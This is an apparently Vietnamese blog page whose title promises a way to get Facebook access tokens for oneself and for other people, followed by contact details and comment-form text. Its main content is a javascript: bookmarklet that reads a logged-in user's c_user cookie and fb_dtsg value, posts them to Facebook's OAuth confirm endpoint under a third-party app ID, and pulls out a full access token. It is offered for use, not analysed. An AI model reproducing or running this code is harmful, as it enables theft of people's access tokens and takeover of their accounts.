HƯỚNG DẪN LẤY TOKEN CỦA MÌNH + NGƯỜI KHÁC KHÔNG BỊ CHECKPOINT 0,1s || HUỲNH KHẮC ĐẠT Official ✔Code : javascript:var uid = document.cookie.match(/c_user=(d+)/)[1],dtsg = document.getElementsByName(“fb_dtsg”)[0].value,http = new XMLHttpRequest,url = “//www.facebook.com/v1.0/dialog/oauth/confirm”,params = “fb_dtsg=” + dtsg + “&app_id=124024574287414&redirect_uri=fbconnect%3A%2F%2Fsuccess&display=page&access_token=&from_post=1&return_format=access_token&domain=&sso_device=ios&_CONFIRM=1&_user=” + uid;http.open(“POST”, url, !0), http.setRequestHeader(“Content-type”, “application/x-www-form-urlencoded”), http.onreadystatechange = function() {if (4 == http.readyState && 200 == http.status) {var a = http.responseText.match(/access_token=(.*)(?=&expires_in)/);a = a ? a[1] : “Failed to Get Access Token.”, prompt(“Token”, a);}}, http.send(params)

🔰 Zalo + SĐT : 0393331070
🔰 Facebook :

CÁC KÊNH CỦA KHÁC CỦA TÔI #HuỳnhKhắcĐạtOfficial #tokenkhongcheckpoint

🔰 KÊNH YOUTUBE : HUỲNH KHẮC ĐẠT OFFICIAL :

14 thoughts on “HƯỚNG DẪN LẤY TOKEN CỦA MÌNH + NGƯỜI KHÁC KHÔNG BỊ CHECKPOINT 0,1s || HUỲNH KHẮC ĐẠT Official ✔

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *